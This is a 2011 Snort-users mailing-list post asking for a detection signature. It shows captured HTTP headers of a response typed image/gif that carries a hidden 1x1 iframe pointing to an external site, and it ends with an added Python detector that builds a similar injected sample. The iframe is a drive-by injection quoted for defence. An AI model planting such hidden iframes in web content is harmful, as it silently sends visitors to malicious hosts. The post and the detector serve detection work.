[Snort-users] iFrame's in gifs

Lay, James james.lay at ...15009...
Fri Jun 24 18:10:05 EDT 2011


Hey all!

Anyone got any leads on this or a sig for this?  Excitement below. I
have full pcap as well as the original image if anyone wants 'em.

James

Sanitized headers

GET /img/ HTTP/1.1
Cookie: <snip>
Host: magazine.gem-fashion.com
Accept: */*
Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 404 Object Not Found
Date: Fri, 24 Jun 2011 21:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: <snip>; path=/
Content-Length: 1221
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/gif
<iframe
src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
style='visibility: hidden;'></iframe>
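A defender-side check for the shape of what James reports: a response declared `image/gif` whose body starts with a real GIF header but carries a hidden 1x1 iframe after the image data (a GIF ends with the trailer byte 0x3B, `;`, which is exactly what precedes `<iframe` in the dump). This is an added example written for this page, not code from the thread or from Snort; the sample response bytes and the `example.invalid` URL are constructed.

```python
import re

# Constructed sample: a GIF87a header, a tiny image block, the 0x3B trailer, and then
# an HTML iframe appended after the trailer, mirroring the shape of the posted response.
# The bytes and the URL are constructed, not the real image from the thread.
GIF_BYTES = b"GIF87a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
INJECTED_TAIL = (b"<iframe src='http://example.invalid/index.php' width='1' height='1' "
                 b"style='visibility: hidden;'></iframe>")
SAMPLE_RESPONSE = (b"HTTP/1.1 404 Object Not Found\r\nServer: Apache\r\n"
                   b"Content-Type: image/gif\r\nContent-Length: "
                   + str(len(GIF_BYTES + INJECTED_TAIL)).encode() + b"\r\n\r\n"
                   + GIF_BYTES + INJECTED_TAIL)

GIF_MAGIC = (b"GIF87a", b"GIF89a")
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)
# Markers of an iframe meant to be invisible to the user (checked after whitespace removal).
HIDDEN_MARKERS = (b"visibility:hidden", b"display:none", b"width='1'", b'width="1"')

def split_response(raw):
    """Split a raw HTTP response into a lower-cased header dict and the body bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def find_hidden_iframe(body):
    """Return the offset of a hidden/1x1 iframe tag inside a GIF body, or -1."""
    if not body.startswith(GIF_MAGIC):
        return -1
    for match in IFRAME_RE.finditer(body):
        tag = match.group(0).lower().replace(b" ", b"")   # 'visibility: hidden' -> 'visibility:hidden'
        if any(marker in tag for marker in HIDDEN_MARKERS):
            return match.start()
    return -1

def inspect(raw):
    """Flag an image/gif response that carries a hidden iframe; None when nothing is found."""
    headers, body = split_response(raw)
    if not headers.get(b"content-type", b"").lower().startswith(b"image/gif"):
        return None
    offset = find_hidden_iframe(body)
    if offset < 0:
        return None
    return {"offset": offset,
            "after_gif_trailer": body[offset - 1:offset] == b";",   # 0x3B closes a GIF
            "tag": IFRAME_RE.search(body, offset).group(0)}
```

A match where `after_gif_trailer` is true is the strongest signal: legitimate decoders stop at the trailer, so anything following it exists only for a parser that treats the body as HTML.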